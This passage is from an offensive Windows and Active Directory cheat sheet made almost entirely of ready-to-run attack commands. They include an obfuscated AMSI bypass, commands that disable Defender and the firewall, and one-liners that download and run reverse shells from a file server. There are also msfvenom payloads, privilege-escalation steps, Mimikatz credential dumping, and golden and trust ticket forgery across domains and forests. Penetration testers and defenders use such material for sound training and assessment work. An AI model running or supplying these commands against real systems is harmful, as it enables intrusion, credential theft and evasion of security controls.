/run:powershell.exe\"'\n```\n\n-\u003e Evil-WinRM  \n```\nevil-winrm -i \u003cip\u003e -u \u003cuser\u003e -H \u003chash\u003e\n```\n\n-\u003e pth.exe  \n```\npth-winexe -U user%hash //ip cmd.exe\n```\n\n-\u003e psexec (msfconsole)  \n```\nuse /exploit/windows/smb/psexec\n```\n\n## Bypass and Disable\n### AppLocker Bypass  \nAnalyse  \n```\n$ExecutionContext.SessionState.LanguageMode\nGet-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections\n```\n\n### AMSI \n(AntiMalwareScan Interface) gives registered antivirus access to the contents of a script prior to execution, dependent on signature-based detection by the active antivirus.  \n-\u003e Detection of malicious scripts in:  \nMemory;  \nDisk;  \nOfuscated;  \nEnabled by default in Windows 10 and supported by Windows Defender.  \n-\u003e AMSI Bypass  \n```\nS`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  \"{1}{0}\"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  ).\"A`ss`Embly\".\"GET`TY`Pe\"((  \"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) ).\"g`etf`iElD\"(  ( \"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  \"{2}{4}{0}{1}{3}\" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  )).\"sE`T`VaLUE\"(  ${n`ULl},${t`RuE} )\n```\nhttps://amsi.fail/   \n-\u003e Disable AMSI  \n```\nSet-MpPreference -DisableScriptScanning 1\n```\n\n### Disable Firewall\n```\nnetsh firewall set opmode disable   \nnetsh Advfirewall set allprofiles state off \n```\n\n### Disable Windows Defender\n```\nSet-MpPreference -DisableRealtimeMonitoring $true -Verbose; Get-MpComputerStatus  \nSet-MpPreference -DisableIOAVProtection $true \n```\n\n### PowerShell Bypass\n-\u003e Types of Bypass:  \nDowngrade to version 2;  \nUnloading, disabling or unsubscribing;  \nObfuscation;  \nTrust abuse (Using trusted executables and code injection in trusted scripts);  \n\n#### Downgrade to version 2;  \nPowerShell version 2 lacks many security mechanisms.\n```\nget-host\npowershell.exe -Version 2\nget-host\n```\n\n### Microsoft ATA (Advanced Threat Analytics) \nhttps://learn.microsoft.com/pt-br/advanced-threat-analytics/what-is-ata\n\n#### Evading ATA - Overpass-the-hash - Bypass\n-\u003e normal AS-REQ packet looks like:  \n\\\\ etype: eTYPE AES256-CTS-HMAC-SHA1-96  \n-\u003e AS-REQ packet overpass-the-hash:  \n```\nPayload: Invoke-Mimikatz '\"sekurlsa::pth /userprivservice /domain:offensiveps.com /ntlm:ntlmhash\"'  \n```\n\\\\ etype: eTYPE-ARCFOUR-HMAC-MD5  \n\nFor bypass:  \n```\nInvoke-Mimikatz -Command '\"sekurlsa::pth /user:privservice /domain:offensiveps.com /aes256:aes256 /ntlm:ntlm /aes128:aes128'\"\n```\nAES256+AES128+NTLM(RC4) together reduces chances of detection.  \n\"AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with KB2871997, in this case you can avoid NTLM hash.\"  \nhttps://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf  \n\n#### Evading ATA - Golden Ticket - Bypass\n```\nInvoke-Mimikatz -Command '\"kerberos::golden /User:privservice /domain:offensiveps.com /sid:sid /aes256:aes256keysofkrbrtgt /id:500 /groups:513 /ptt\"'\n```\n\n### Reverse Shell and Access\n-\u003e Invoke-PowerShellTcp + powercat  \n```\n. .\\powercat.ps1\npowercat -l -v -p 443 -t 1000\npowershell.exe iex (iwr http://\u003cfile_server_IP\u003e/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress \u003cip\u003e -Port 443\npowershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://\u003cfile_server_IP\u003e/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress \u003cip\u003e -Port 443\n```\nhttps://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1  \nhttps://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1\n\n-\u003e Bypass  \n\"Villain is a Windows \u0026 Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.\"  \nhttps://github.com/t3l3machus/Villain\nHoaxshell  \n\"hoaxshell is a Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.\"  \nhttps://github.com/t3l3machus/hoaxshell\n\n## Port Forwarding and Proxying\n### Port Forwarding\n#### SSH Tunneling/Local Port Forwarding  \n```\nssh user@\u003cip\u003e -p port -L 8001:127.0.0.1:8080 -fN\n```\n\n#### SSH Remote Port Forwarding\n```\nssh -R 5555:127.0.0.1:5555 -p2222 \u003cuser\u003e@\u003cip\u003e\n```\n\n#### Socat - Port Forward\n```\n./socat.exe TCP-LISTEN:8002,fork,reuseaddr TCP:127.0.0.1:8080\n```\n\n#### chisel  - Remote Port Forward \n-\u003e Your machine  \n```\n./chisel server -p \u003cLISTEN_PORT\u003e --reverse \u0026\n```\n\n-\u003e Compromised Host\n```\n./chisel client \u003cATTACKING_IP\u003e:\u003cLISTEN_PORT\u003e R:\u003cLOCAL_PORT\u003e:\u003cTARGET_IP\u003e:\u003cTARGET_PORT\u003e \u0026\n```\n\n#### Chisel - Local Port Forward\n-\u003e Compromised Host  \n```\n./chisel server -p \u003cLISTEN_PORT\u003e\n```\n\n-\u003e Your Machine  \n```\n./chisel client \u003cLISTEN_IP\u003e:\u003cLISTEN_PORT\u003e \u003cLOCAL_PORT\u003e:\u003cTARGET_IP\u003e:\u003cTARGET_PORT\u003e\n```\n\n#### pklink - Remote Port Forward\n```\ncmd.exe /c echo y | plink.exe -ssh -l \u003cuser\u003e -pw \u003cpassword\u003e -R 192.168.0.20:1234:127.0.0.1:3306 192.168.0.20\n```\n\n### Proxying - Network Pivoting\n#### sshuttle (Unix) - proxying  \n```\nsshuttle -r user@\u003cip\u003e --ssh-cmd \"ssh -i private_key\" 172.16.0.0/24\n```\n\n#### SSH + Proxychains\nedit /etc/proxychains.conf with socks4 127.0.0.1 8080\n```\nssh -N -D 127.0.0.1:8080 \u003cuser\u003e@\u003cip\u003e -p 2222\n```\n  \n#### chisel  - Reverse Proxy\n-\u003e Your Machine  \n```\n./chisel server -p LISTEN_PORT --reverse \u0026\n```\n\n-\u003e Compromised Host  \n```\n./chisel client \u003cTARGET_IP\u003e:\u003cLISTEN_PORT\u003e R:socks \u0026\n```\n\n#### chisel - Forward Proxy  \n-\u003e Compromised Host  \n```\n./chisel server -p \u003cLISTEN_PORT\u003e --socks5\n```\n\n-\u003e Your Machine  \n```\n./chisel client \u003cTARGET_IP\u003e:\u003cLISTEN_PORT\u003e \u003cPROXY_PORT\u003e:socks\n```\n\n#### metasploit - proxying \n```\nroute add \u003cip\u003e/24 1\nroute print\nuse auxiliary/server/socks_proxy\nrun\n```\n\n## Local Privilege Escalation\n### binPath - Services\n-\u003e Detection\n```\n. .\\PowerUp.ps1\nGet-ModifiableService -Verbose\n```\nor\n```\nGet-ModifiableService -Verbose\nwmic service get Name,State,PathName | findstr \"Running\" | findstr \"Program\"  \nwmic service get Name,State,PathName | findstr \"Program\"  \nicacls \u003cpathname\u003e  \n//(F) and (i) (F)\naccesschk.exe -wuvc \u003cservice_name\u003e\n//RW Everyone  \n//  SERVICE_CHANGE_CONFIG\nsc qc \u003cservice_name\u003e\n```\n\n-\u003e Exploitation - windows\n```\ncertutil -urlcache -f http://10.9.1.137:803/ok.exe ok.exe  \nsc config \u003cname_ service\u003e binPath=\"C:\\Users\\files\\ok.exe\" obj= LocalSystem  \nsc stop \u003cservice_name\u003e  \nsc query \u003cservice_name\u003e  \nsc start \u003cservice_name\u003e  \n```\n\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite  \n\n### Unquoted Service Path - Services\n-\u003e Detection\n```\nwmic service get Name,State,PathName | findstr \"Program\"  \nsc qc \u003cservice_name\u003e  \n\\\\ BINARY_PATH_NAME display Unquoted Service Paths, without \"\"\npowershell \"get-acl -Path 'C:\\Program Files (x86)\\System Explorer' | format-list\"\n```\nor  \n```\n. .\\PowerUp.ps1\nGet-ServiceUnquoted -Verbose (PowerUp) \n```\n\n-\u003e Exploitation\n```\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=\u003cip\u003e LPORT=\u003cport\u003e -f exe \u003e name \u003cname_inside_the_path\u003e.exe  \nmove \u003cname_inside_the_path\u003e.exe \u003cservice_path\u003e  \nsc stop \u003cservice_name\u003e\nsc start \u003cservice_name\u003e\n```\nor  \n```\nInvoke-ServiceAbuse -Name \u003cservice_name\u003e -UserName $(whoami)\n```\n\n### Unquoted Service Path - Services (STEALTH) - Evasion AV\n-\u003e Install\n```\nsudo apt install mono-devel\n```\n-\u003e Wrapper.cs  \n```\nusing System;\nusing System.Diagnostics;\n\nnamespace Wrapper{\n        class Program{\n                        static void Main(){\n                        Process proc = new Process();\n                        ProcessStartInfo procInfo = new ProcessStartInfo(\"c:\\\\windows\\\\temp\\\\nc.exe\", \"\u003cip\u003e \u003cport\u003e -e cmd.exe\");\n                        procInfo.CreateNoWindow = true;\n                        proc.StartInfo = procInfo;\n                        proc.Start();\n                }\n        }\n}\n```\n-\u003e Compile C# Code\n```\nmcs Wrapper.cs\n```\nNow move to the target, and place it in the correct directory with the correct name to exploit the service.  \n```\nsc stop \u003cnameservice\u003e\n```\n```\nsc start \u003cnameservice\u003e\n```\n\n#### Modify configuration of services - Services\n```\nGet-ModifiableService -Verbose (PowerUp)\n```\n\n### SeBackup / SeRestore - Windows Privileges\n-\u003e Detection\n```\nwhoami /priv\n\\\\SeBackupPrivilege  \n\\\\SeRestorePrivilege  \n```\n\n-\u003e Exploitation  \n```\nreg save hklm\\system C:\\Users\\user\\system.hive  \nreg save hklm\\sam C:\\Users\\user\\sam.hive\n```\n\n### SeTakeOwnership - Windows Privileges\n-\u003e Detection  \n```\nwhoami /priv  \n//SeTakeOwnership\n```\n\n-\u003e Exploitation  \n```\ntakeown /f C:\\Windows\\System32\\Utilman.exe  \nicacls C:\\Windows\\System32\\Utilman.exe /grant \u003cuser\u003e:F  \ncopy cmd.exe utilman.exe\n```\n### SeImpersonate / SeAssignPrimaryToken - Windows Privileges\n-\u003e Detection\n```\nwhoami /priv\n// SeAssignPrimaryTokenPrivilege\n// SeImpersonatePrivilege\n```\n\n-\u003e Exploitation\n```\npowershell.exe -c \"wget http://ip/RogueWinRM.exe -O RogueWinRM.exe\"  \nc:\\tools\\RogueWinRM\\RogueWinRM.exe -p \"C:\\nc64.exe\" -a \"-e cmd.exe \u003cip\u003e \u003cport\u003e\"\n```\nor  \n```\nPrintSpoofer64.exe -i -c cmd\n```\nhttps://github.com/itm4n/PrintSpoofer\n\n### Other Docs\nhttps://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants  \nhttps://github.com/gtworek/Priv2Admin\n\n### Tasks\n-\u003e Detection\n```\nschtasks\nschtasks /query /tn \u003ctask\u003e /fo list /v\nicacls \u003ctask_path\u003e \n\\\\ BUILTIN\\Users:(I)(F)\n```\n\n-\u003e Exploitation\n```\necho \"net localgroup administrators user /add\" \u003e \u003ctask_path\u003e\nschtasks /run /tn \u003ctask\u003e\n```\n\n### Autorun\n-\u003e Detection\n```  \nC:\\Users\\User\\Desktop\\Tools\\Accesschk\\accesschk64.exe -wvu \"\"C:\\Program Files\\Autorun Program\"  \n\\\\FILE_ALL_ACCESS\n```\n\n-\u003e Exploitation  \n```\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=\u003cip\u003e lport=\u003cport\u003e -f exe -o program.exe\n```\n```\nmove program.exe \"C:\\Program Files\\Autorun Program\"\nlogoff\n```\n  \n### AlwaysInstallElevated\n-\u003e Detection  \n```\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer \n\\\\ value is 1  \nreg query HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer  \n\\\\ value is 1 \n```\n\n-\u003e Exploitation  \n```\nmsfvenom -p windows/x64/shell_reverse_tcp lhost=ip lport=port -f msi -o ok.msi\nmsiexec /quiet /qn /i C:\\Temp\\ok.msi\n```\n\n### Registry\n-\u003e Detection\n```\npowershell.exe -c \"Get-Acl -Path hklm:\\System\\CurrentControlSet\\services\\regsvc | fl\"  \n\\\\NT AUTHORITY\\INTERACTIVE Allow FullControl  \nnet localgroup administrators\n```\n\n-\u003e Exploitation\n```\nwget https://raw.githubusercontent.com/sagishahar/scripts/master/windows_service.c (edit)  \nsudo apt install gcc-mingw-w64  \nx86_64-w64-mingw32-gcc windows_service.c -o ok.exe  \n```\n```\nreg add HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\\temp\\ok.exe /f  \nsc start regsvc  \nnet localgroup administrators\n```\n\n### Executable Files\n-\u003e Detection\n```\nC:\\Users\\User\\Desktop\\Tools\\Accesschk\\accesschk64.exe -wvu \"C:\\Program Files\\File Permissions Service\"\n\\\\RW Everyone  \n\\\\  FILE_ALL_ACCESS  \nnet localgroup administrators\n```\n\n-\u003e Exploitation\n```\nwget https://raw.githubusercontent.com/sagishahar/scripts/master/windows_service.c (edit)\nsudo apt install gcc-mingw-w64  \nx86_64-w64-mingw32-gcc windows_service.c -o ok.exe\n```\n```\ncopy /yc:\\Temp\\x.exe \"c:\\Program Files\\File Permissions Service\\filepermservice.exe\"\nsc start filepermsvc\n```\n\n### Startup Applications\n-\u003e Detection - Windows\n```\nicacls.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" | findstr (F)  \n\\\\BUILTIN\\Users:(F)\n```\n\n-\u003e msfvenom - Attacker VM\n```\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=\u003cip\u003e LPORT=\u003cport\u003e -f exe -o ok.exe\n```\n\n-\u003e Exploitation - Windows\n```\niex (iwr http://\u003cfile_server_IP\u003e/PowerView.ps1 -Outfile ok.exe)\nmove ok.exe “C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup”\nlogoff\n```\n  \n### Hot Potatle\n-\u003e Exploitation\n```\nnet localgroup administrators  \npowershell.exe -nop -ep bypass  \npowershell.exe -c \"wget https://raw.githubusercontent.com/Kevin-Robertson/Tater/master/Tater.ps1 -O Tater.ps1\"  \nImport-Module C:\\Users\\User\\Desktop\\Tools\\Tater\\Tater.ps1  \nInvoke-Tater -Trigger 1 -Command \"net localgroup administrators user /add\"  \nnet localgroup administrators\n```\n  \n### DLL Hijacking\n-\u003e Exploitation\n```\nwget https://raw.githubusercontent.com/sagishahar/scripts/master/windows_dll.c (edit)  \nx86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll  \nmove hijackme.dll \u003cpath\u003e  \nsc stop \u003cservice_name\u003e \u0026 sc start \u003cservice_name\u003e  \n```\n\n### Automated Enumeration - Local Privilege Escalation\n-\u003e PowerUp  \n```\n. .\\PowerUp.ps1\nInvoke-AllChecks\n```\nhttps://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1  \n\n-\u003e BeRoot  \n```\n. .\\beRoot.exe\n```\nhttps://github.com/AlessandroZ/BeRoot/releases \n\n-\u003e Privesc  \n```\n. .\\privesc.ps1\nInvoke-PrivEsc\n```\nhttps://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1  \n\n-\u003e Winpeas  \n```\nwinpeas.exe \u003e outputfile.txt\n```  \nhttps://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\n\n-\u003e PrivescCheck  \n```\nSet-ExecutionPolicy Bypass -Scope process -Force\n. .\\PrivescCheck.ps1\nInvoke-PrivescCheck\n```\nhttps://github.com/itm4n/PrivescCheck \n\n-\u003e Windows Exploit Suggester - Next Generation (WES-NG)  \n```\nsysteminfo \u003e systeminfo.txt\n```\n```\npython wes.py systeminfo.txt\n```\n  \nhttps://github.com/bitsadmin/wesng\n\n-\u003e Kernel Exploits - meterpreter  \n```\nrun post/multi/recon/local_exploit_suggester\n```\n\n-\u003e windows-privesc-check2.exe  \n```\nwindows-privesc-check2.exe --dump -G\n```\nhttps://github.com/pentestmonkey/windows-privesc-check\n\n## Domain Privilege Escalation\n### Kerberos Delegation\nDelegation in Kerberos is a setting that allows reuse of end user credentials to access resources hosted on a different server.  \ne.g  \nUsers authenticate to a web server and the web server makes requests to a database server. The web server can request access to resources (specific resources(Constrained Delegation), all resources(Unconstrained Delegation)) on the database server as a user and not as a web server service account.  \n\n#### Unconstrained Delegation\n\u003ca href=\"https://adsecurity.org/wp-content/uploads/2015/08/Visio-KerberosUnconstrainedDelegation-visio.png\"\u003e\n  \u003cimg height=350 src=\"https://adsecurity.org/wp-content/uploads/2015/08/Visio-KerberosUnconstrainedDelegation-visio.png\" /\u003e\n\u003c/a\u003e\n\nAllows the first hop server to request access to any service or computer in the domain.  \n-\u003e Discover domain computers which have unconstrained delegation enabled\n```\nGet-NetComputer -Unconstrained (PowerView)\nGet-ADComputer -Filter {TrustedForDelegation -eq $True} (AD Module)\nGet-ADUser -Filter {TrustedForDelegation -eq $True} (AD Module)\n```\n\n-\u003e Verify Local Admin Access, therefore, you need to have a user that has local administrator access on the server.  \n```\nFind-LocalAdminAccess\n```\n```\n$sess = New-PSSession -ComputerName \u003chostname\u003e\nInvoke-Command -FilePath C:\\Tools\\Invoke-Mimikatz.ps1 -Session $sess\nEnter-PSSession -Session $sess\n```\n\n-\u003e  Run the following mimikatz command in the new PowerShell session running with the user to check if a domain admin ticket already exists, before Create a new directory to avoid overwriting tickets from other users.  \n```\nmkdir user1\ncd user1 \nInvoke-Mimikatz -Command '\"sekurlsa::tickets /export\"'\nls | select name\n```\n\n-\u003e If you don't have a domain admin ticket and you have to wait or trick a DA to access a resource on the server, use this trick:\n```\nInvoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose\n```\n\n-\u003e export tickets  \n```\nInvoke-Mimikatz -Command '\"sekurlsa::tickets /export\"'\nls | select name\n```\n\n-\u003e Reuse the ticket by injecting it into lsass to get DA privileges:  \n```\nInvoke-Mimikatz -Command '\"kerberos::ptt [0;a925ff]-2-0-60a10000-Administrator@krbtgt-EXAMPLE.OKCORP.LOCAL.kirbi\"'\n```\n\n### Constrained Delegation\n\u003ca href=\"https://en.hackndo.com/assets/uploads/2019/02/constrained_delegation_schema.png\" \u003e\n\u003cimg height=500 src=\"https://en.hackndo.com/assets/uploads/2019/02/constrained_delegation_schema.png\" /\u003e\n\u003c/a\u003e\n\nAllows the first hop server to request access only to specified services on specified computers.  \n-\u003e Enumerate users and computers with constrained delegation enabled\n```\nGet-DomainUser -TrustedToAuth (PowerView)\nGet-DomainComputer -TrustedToAuth (PowerView)\nGet-ADObject -Filter {msDS-AllowedToDelegateTo -ne \"$null\"} -Properties msDS-AllowedToDelegateTo\n```\n\n-\u003e Exploitation\n```\n.\\kekeo.exe\ntgt::ask /user:ok$ /domain:example.okcorp.local /rc4:\u003chash\u003e\ntgs::s4u /tgt:\u003ctgt_file\u003e /user:Administrator@\u003cdomain\u003e /service:CIFS/\u003chostname\u003e.\u003cdomain\u003e\nInvoke-Mimikatz -Command '\"kerberos::ptt \u003ctgs_file\u003e\"'\nklist\n```\nor\n```\n.\\Rubeus.exe s4u /user:ok$ /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:\"CIFS/\u003chostname\u003e.\u003cdomain\u003e\" /ptt\n```\nor\n```\n.\\kekeo.exe\ntgt::ask /user:\u003cmachine$\u003e  /domain:example.okcorp.local /rc4:\u003chash_machine_account\u003e\ntgs::s4u /tgt:\u003ctgt_file\u003e /user:Administrator@\u003cdomain\u003e /service:\u003cservice_name\u003e|LDAP/\u003chostname\u003e\nInvoke-Mimikatz -Command '\"kerberos::ptt \u003ctgs_file\u003e\nklist\nInvoke-Mimikatz -Command '\"lsadump::dcsync /user:dcorp\\krbtgt\"'\n```\n\n### Kerberoast\nIt is an attack technique where an attacker/user requests a TGS from the KDC for services running on behalf of user accounts in AD, after capturing the TGS from memory, the hash of the offline service account is broken.  \n-\u003e Discover services running with user accounts\n```\nGet-NetUser -SPN\n```\n\n-\u003e After finding a user with defined SPN, request a ticket for the service.\n```\nAdd-Type -AssemblyName System.IdentityModel\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"\u003cservice\u003e/\u003chostname\u003e\u003cdomain\u003e\"\nklist\n```\n\n-\u003e Dumping tickets to disk:\n```\nInvoke-Mimikatz -Command '\"kerberos::list /export\"'\n```\n\n-\u003e Offline crack service account password  \n```\npython.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\\u003ctgs_file\u003e\n```\n\nhttps://raw.githubusercontent.com/OWASP/passfault/master/wordlists/wordlists/10k-worst-passwords.txt  \nhttps://raw.githubusercontent.com/nidem/kerberoast/master/tgsrepcrack.py  \n\n### AS-REP Roasting\nAS-REP Roasting is a technique where the goal is to dump hashes of user accounts that have Kerberos preauthentication disabled (Do not require Kerberos preauthentication property).  \nUnlike Kerberoasting, these users do not need to be service accounts.  \n\n-\u003e Enumerate the users who have Kerberos Preauth disabled. (PowerView) \n```\nGet-DomainUser -PreauthNotRequired -Verbose\n```\n\n-\u003e Request the crackable encrypted part of AS-REP that can be broken  \n```\nGet-ASREPHash -UserName VPNxuser-Verbose`\n```\n\n-\u003e Use john or hashcat to break hashes offline  \n```\nhashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt\n```\n```\njohn hash.txt --wordlist=/usr/share/wordlists/rockyou.txt\n```\n\n### Loading arbitrary DLL\nMembers of the DNSAdmins group Loading arbitrary DLL with the privileges of dns.exe ( SYSTEM )  \nIn case the DC also serves as DNS this will give us the escalation for the DA.  \n\nNeed privileges to restart DNS service.\n-\u003e Detection (enumerate the members of the DNSAdmins group\n```\nGet-NetGroupMember -GroupName \"DNSAdmins\"\nGet-ADGroupMember -Identity DNSAdmins\n```\n\n-\u003e Configure DLL using dnscmd.exe (needs RSAT DNS):\n```\ndnscmd dcorp-dc /config /serverlevelplugindll \\\\\u003cip\u003e\\dll\\mimilib.dll\nsc \\\\dcorp-dc stop dns\nsc \\\\dcorp-dc start dns\ntype c:\\Windows\\System32\\kiwidns.log\n```\n\n### Trust Abuse - MSSQL Servers\n-\u003e Discovery - SPN Scanning\n```\nGet-SQLInstanceDomain\n```\n\n-\u003e Check Accessibility\n```\nGet-SQLConnectionTestThreaded\n```\n```\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose\n```\n\n-\u003e Gather Information\n```\nGet-SQLInstanceDomain | Get-SQLServerInfo -Verbose\n```\n\n-\u003e Searching Database Links\n```\nGet-SQLServerLink -Instance srv-mssql -Verbose\n```\nor in .exe  \n```\nselect * from master..sysservers\n```\n\n-\u003e Enumerating DatabaseLinks via powerUPSQL\n```\nGet-SQLServerLinkCrawl -Instance srv-mssql -Verbose\n```\nor  \n-\u003e Enumerating DatabaseLinks via Openquery with - Openquery queries can be chained to access links within links(nested links)\n```\nselect * from openquery(\"srv-sql1\",'select * from openquery(\"srv-mgmt\",\"select * from master..sysservers\")')\n```\n\n-\u003e Executing Commands  \nOn the target server, either xp_cmdshell should be already enabled or if rpcout is enabled (disabled by default), xp_cmdshell can be enabled using:  \n```\nEXECUTE('sp_configure \"xp_cmdshell\",1;reconfigure;')AT \"eu-sql\"\n```\n\n```\nGet-SQLServerLinkCrawl -Instance srv-mssql -Query \"exec master..xp_cmdshell 'whoami'\" | ft\n```\nor\n```\nselect * from openquery(\"srv-sql1\",'select * from openquery(\"srv-mgmt\",\"select * from openquery(\"us-sql\",\"\"select @@version as version;exec master..xp_cmdshell \"powershell whoami)\"\")\")')\n```\nor  \n```\nInvoke-SQLOSCmd -Verbose -Command \"powershell iex(New-Object Net.WebClient).DownloadString(‘http://\u003cfile_server\u003e/Invoke-PowerShellTcp.ps1') -Instance \u003chostname\u003e.\u003cdomain\u003e\n```\nhttps://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1\n\n### forcechangepassword\n```\nSet-ADAccountPassword -Identity \u003cuser\u003e -NewPassword (ConvertTo-SecureString -AsPlainText \"okay@12345\" -Force)\n```\n\n## Escalating privileges across domains \nThere is an implicit two-way trust of domains with other domains in the same forest  \nThere are two ways of escalating privileges between domains in the same forest:  \n– Trust tickets  \n– Krbtgthash  \n\n### Mimikatz - Mix\n```\nInvoke-Mimikatz -Command '\"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\" \"lsadump::lsa /inject\" \"lsadump::sam\" \"lsadump::cache\" \"sekurlsa::ekeys\" \"vault::cred /patch\" \"exit\"'\n```\n### Mimikatz -  Get Clear-Text Passwords of scheduled tasks\n```\nInvoke-Mimikatz -Command '\"privilege::debug\" \"token::elevate\" \"vault::cred /patch\"'\n```\n\n### Using the domain trust key - Child to parent using Trust Tickets  \n-\u003e get rc4 trust key  \n```\nInvoke-Mimikatz -Command '\"lsadump::trust /patch\"' -ComputerName dcorp-dc\n```\nor  \n```\nInvoke-Mimikatz-Command'\"lsadump::dcsync/user:dcorp\\mcorp$\"'\n```\n-\u003e get SID current domain  \n```\nGet-DomainSID (PowerView)\n```\n\n-\u003e get SID of the enterprise admins group of the parent domain  \n```\nGet-DomainGroup -Identity \"Enterprise Admins\" -Domain \u003cparent_domain\u003e\n```\n\n-\u003e Exploiting  \n```\nInvoke-Mimikatz -Command '\"kerberos::golden /user:Administrator /domain:\u003cchild_domain\u003e /service:krbtgt /rc4:\u003crc4_trust_key\u003e /sid:\u003csid_current_domain\u003e /sids:\u003csid_enterprise_admins\u003e /target:\u003cparent_domain\u003e /ticket:C:\\Tools\\kekeo_old\\trust_tkt.kirbi\"'\n```\n\n```\n.\\asktgs.exe C:\\AD\\Tools\\kekeo_old\\trust_tkt.kirbi CIFS/ok-dc.\u003cparent_domain\u003e\n.\\kirbikator.exe lsa .\\CIFS.ok-dc.\u003cparent_domain\u003e.kirbi\n```\nor  \n```\n.\\Rubeus.exe asktgs /ticket:C:\\AD\\Tools\\kekeo_old\\trust_tkt.kirbi /service:cifs/ok-dc.\u003cparent_domain\u003e /dc:ok-dc.\u003cparent_domain\u003e /ptt\n```\n```\nklist\n```\n\n### Using hash krbtgt - Child to parent using krbtgt hash  \n-\u003e get hash krbtgt  \n```\nInvoke-Mimikatz -Command '\"lsadump::lsa /patch\"'\n```\n\n-\u003e get SID current domain  \n```\nGet-DomainSID (PowerView)\n```\n\n-\u003e get SID of the enterprise admins group of the parent domain  \n```\nGet-DomainGroup -Identity \"Enterprise Admins\" -Domain \u003cparent_domain\u003e\n```\n```\nInvoke-Mimikatz -Command '\"kerberos::golden /user:Administrator /domain:ok.example.local /krbtgt:\u003cktbtgt_hash\u003e /sid:\u003cdomain_sid\u003e /sids:\u003csid_enterprise_admin_of_the_parent_domain\u003e-519 /ticket:C:\\Tools\\kekeo_old\\krbtgt_tkt.kirbi\"'\nInvoke-Mimikatz -Command '\"kerberos::ptt C:\\Tools\\krbtgt_tkt.kirbi\"'\n```\n\n-\u003e Schedule a task and run it as SYSTEM  \n```\nschtasks /create /S dev.dc.example.local /SC Weekly /RU \"NT Authority\\SYSTEM\" /TN \"STCheckx\" /TR \"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://ip/Invoke-PowerShellTcp.ps1''')'\"\nschtasks /Run /S dev-dc.example.local /TN \"STCheckx\"\n```\n```\npowercat -l -v -p 443 -t 1000\n```\n\n## Across Forest using Trust Tickets\n```\nInvoke-Mimikatz -Command '\"lsadump::trust /patch\"' -ComputerName dcorp-dc\n```\nor  \n```\nInvoke-Mimikatz -Command '\"lsadump::lsa /patch\"' -ComputerName dcorp-dc\n```\n\n-\u003e get SID current domain  \n```\nGet-DomainSID (PowerView)\n```\n```\nInvoke-Mimikatz -Command '\"kerberos::golden /user:Administrator /domain:\u003cforest_domain_1\u003e /service:krbtgt /rc4:28167df917b795605413be3e5aa59426 /sid:S-1-5-21-1874506631-3219952063-538504511 /target:\u003cforest_domain_2\u003e /ticket:C:\\Tools\\kekeo_old\\d2_trust_tkt.kirbi\"'\n```\n```\n.\\asktgs.exe C:\\Tools\\kekeo_old\\d2_trust_tkt.kirbi CIFS/\u003cdc_forest_2\u003e\n.\\kirbikator.exe lsa.\\CIFS/\u003cdc_forest_2\u003e\n```\nor  \n```\n.\\Rubeus.exe asktgs /ticket:C:\\Tools\\kekeo_old\\trust_forest_tkt.kirbi /service:cifs/\u003cdc_forest_2\u003e /dc:\u003cdc_forest_2\u003e /ptt\n```\n\n## Persistence\n### Golden Ticket \nIt is a persistence and elevation of privilege technique where tickets are forged to take control of the Active Directory Key Distribution Service (KRBTGT) account and issue TGT's.  \n\n-\u003e Get krbtgt NTHash  \n-\u003e lsa  \n```\nInvoke-Mimikatz -Command '\"lsadump::lsa /patch\"'\n```\nor  \n-\u003e DCSync Attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication.   \n```\nInvoke-Mimikatz -Command '\"lsadump::dcsync /user:\u003cdomain\u003e\\krbtgt'\"\n```\n\n-\u003e get SID\n```\nGet-Domainsid (PowerView)\n```\n\n-\u003e Exploitation  \n```\nInvoke-Mimikatz -Command '\"kerberos::golden /User:Administrator 